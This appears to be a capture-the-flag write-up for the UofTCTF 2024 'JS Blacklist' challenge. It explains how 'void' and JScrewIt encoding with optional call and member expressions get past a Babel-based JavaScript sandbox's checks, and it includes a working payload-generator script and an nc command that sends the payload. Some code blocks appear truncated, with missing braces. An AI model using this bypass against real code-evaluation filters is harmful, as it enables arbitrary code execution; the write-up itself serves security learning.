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Last active January 16, 2024 03:44
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UofTCTF 2024 JS Blacklist writeup

Testing the jail and transformations interactively:

Bypass isStaticallyEvaluable

Only the root nodes are checked for being an expression wrapper:

if (!node.isExpressionWrapper()) {
  isConfident = false;
const { confident } = node.evaluate();
if (!confident) {
  isConfident = false;

Looking at the source code for path.evaluate, we can see that void <any expression> can bypass both of these checks as babel doesn't care about side-effects:

if (path.node.operator === "void") {
  // we don't need to evaluate the argument to know what this will return
  return undefined;

Bypass noBlacklistedNodes

"Function|CallExpression|Declaration|TaggedTemplateExpression|TemplateElement|Import|NewExpression|DebuggerStatement|AssignmentExpression|ObjectExpression|MemberExpression|PatternLike|Literal|SpreadElement"(path) {
  hasBlacklistedNode = true;

Upon testing all node types in babel against this filter (e.g. t.isFunction({ type: "..." })) we can find some interesting ones that aren't blacklisted: OptionalMemberExpression and OptionalCallExpression.

JScrewIt is a more optimized JSFuck version and uses only the characters ! ( ) + [ ] to execute any JavaScript. After converting to optional expressions it bypasses the node blacklist completely:


function bypassJail(input) {
  const ast = parser.parse(
    JScrewIt.encode(input, { features: ["NODE_16_6"], runAs: "eval" })
  traverse(ast, {
    CallExpression({ node }) {
      node.type = "OptionalCallExpression";
      node.optional = true;
    MemberExpression({ node }) {
      node.type = "OptionalMemberExpression";
      node.optional = true;
  return "void " + generate(ast, { compact: true }).code;

Getting the flag:

node generate-payload.js | nc 5000
import _generate from "@babel/generator";
import * as parser from "@babel/parser";
import _traverse from "@babel/traverse";
import JScrewIt from "jscrewit";
const traverse = _traverse.default;
const generate = _generate.default;
function bypassJail(input) {
const ast = parser.parse(
JScrewIt.encode(input, { features: ["NODE_16_6"], runAs: "eval" })
traverse(ast, {
CallExpression({ node }) {
node.type = "OptionalCallExpression";
node.optional = true;
MemberExpression({ node }) {
node.type = "OptionalMemberExpression";
node.optional = true;
return "void " + generate(ast, { compact: true }).code;
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